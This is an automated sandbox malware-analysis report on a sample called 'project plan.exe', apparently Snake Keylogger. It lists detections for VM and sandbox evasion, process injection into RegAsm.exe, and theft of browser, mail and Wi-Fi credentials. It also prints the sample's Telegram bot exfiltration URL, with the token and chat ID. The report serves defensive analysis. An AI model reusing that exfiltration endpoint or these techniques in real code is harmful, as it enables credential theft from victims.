                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\project plan.exeMemory allocated: 16754D70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeMemory allocated: 1676E690000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: F60000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: Amcache.hve.7.drBinary or memory string: VMware
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: RegAsm.exe, 00000003.00000002.3220966436.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.2042868359.0000000000831000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dc9b102694a6ea<
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F688C0 LdrInitializeThunk,LdrInitializeThunk,3_2_00F688C0
                Source: C:\Users\user\Desktop\project plan.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: project plan.exe, -------.csReference to suspicious API methods: GetProcAddress(_08EA_08E2_EE64_061A_EED3_EEFF, _0618_08D2_08F2_EE97_EE3A_EE20_EEBB_ECB4_064E_EE6B_EE7F_EE03_EEDF_060F)
                Source: project plan.exe, -------.csReference to suspicious API methods: VirtualProtect(procAddress, (uint)_0E74_06DC_066D_EE6C_0EBB_EE37_EE1D_EE5B_08FF_08E8_06FD_EEF9.Length, 64u, out var _EE1B_0EB9_EE85_EEF8_0E68_06DC_061E_EE14_EE69_EED8_0EB6_EE43_EE2E_EEA0_0E7F_EE71)
                Source: project plan.exe, -------.csReference to suspicious API methods: LoadLibrary(_EEF9_08FE_ECA9_EEE9(_0602_EC97_06D8_EE8E_EE96_ECA5_EEBD_EE09_EEE3_EE39._ECB1_ECB7_066B_EE9D_EE63_ECAC_06DC_06EB))
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\project plan.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\project plan.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\project plan.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\project plan.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\project plan.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000Jump to behavior
                Source: C:\Users\user\Desktop\project plan.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 424000Jump to behavior
                Source: C:\Users\user\Desktop\project plan.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AFF008Jump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profileJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeQueries volume information: C:\Users\user\Desktop\project plan.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Uses netsh to modify the Windows network and firewall settings
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile
                Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3221467298.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR
                Tries to harvest and steal WLAN passwords
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profileJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3221467298.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		311
                Process Injection                		2
                Virtualization/Sandbox Evasion                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		11
                Disable or Modify Tools                		LSASS Memory2
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol11
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)311
                Process Injection                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin Shares1
                Data from Local System                		1
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS1
                System Network Configuration Discovery                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                Obfuscated Files or Information                		LSA Secrets13
                System Information Discovery                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466687 Sample: project plan.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 29 api.telegram.org 2->29 31 checkip.dyndns.org 2->31 33 checkip.dyndns.com 2->33 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Sigma detected: Capture Wi-Fi password 2->43 47 8 other signatures 2->47 9 project plan.exe 3 2->9         started        signatures3 45 Uses the Telegram API (likely for C&C communication) 29->45 process4 signatures5 49 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->49 51 Writes to foreign memory regions 9->51 53 Allocates memory in foreign processes 9->53 55 Injects a PE file into a foreign processes 9->55 12 RegAsm.exe 15 2 9->12         started        16 WerFault.exe 19 16 9->16         started        19 conhost.exe 9->19         started        21 RegAsm.exe 9->21         started        process6 dnsIp7 35 api.telegram.org 149.154.167.220, 443, 49711 TELEGRAMRU United Kingdom 12->35 37 checkip.dyndns.com 132.226.247.73, 49704, 80 UTMEMUS United States 12->37 57 Tries to steal Mail credentials (via file / registry access) 12->57 59 Uses netsh to modify the Windows network and firewall settings 12->59 61 Tries to harvest and steal browser information (history, passwords, etc) 12->61 63 Tries to harvest and steal WLAN passwords 12->63 23 netsh.exe 2 12->23         started        27 C:\ProgramData\Microsoft\...\Report.wer, Unicode 16->27 dropped file8 signatures9 process10 process11 25 conhost.exe 23->25         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                project plan.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                api.telegram.org2%VirustotalBrowse
                checkip.dyndns.com0%VirustotalBrowse
                checkip.dyndns.org1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://upx.sf.net0%URL Reputationsafe
                http://upx.sf.net0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://checkip.dyndns.org/0%Avira URL Cloudsafe
                http://checkip.dyndns.org0%Avira URL Cloudsafe
                https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake0%Avira URL Cloudsafe
                http://checkip.dyndns.com0%Avira URL Cloudsafe
                https://api.telegram.org0%Avira URL Cloudsafe
                https://api.telegram.org/bot0%Avira URL Cloudsafe
                http://api.telegram.org0%Avira URL Cloudsafe
                http://checkip.dyndns.org/q0%Avira URL Cloudsafe
                http://checkip.dyndns.org/1%VirustotalBrowse
                http://checkip.dyndns.org1%VirustotalBrowse
                http://checkip.dyndns.com0%VirustotalBrowse
                https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=53610%Avira URL Cloudsafe
                https://api.telegram.org/bot1%VirustotalBrowse
                https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=53612%VirustotalBrowse
                http://checkip.dyndns.org/q0%VirustotalBrowse
                http://api.telegram.org2%VirustotalBrowse
                https://api.telegram.org1%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                api.telegram.org
                		149.154.167.220
                		truetrueunknown
                checkip.dyndns.com
                		132.226.247.73
                		truefalseunknown
                checkip.dyndns.org
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snakefalse
                • Avira URL Cloud: safe
                		unknown
                http://checkip.dyndns.org/false
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://upx.sf.netAmcache.hve.7.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://checkip.dyndns.orgRegAsm.exe, 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002D29000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://checkip.dyndns.comRegAsm.exe, 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://api.telegram.orgRegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmptrue
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://api.telegram.org/botproject plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://api.telegram.orgRegAsm.exe, 00000003.00000002.3221467298.0000000002E57000.00000004.00000800.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://checkip.dyndns.org/qproject plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
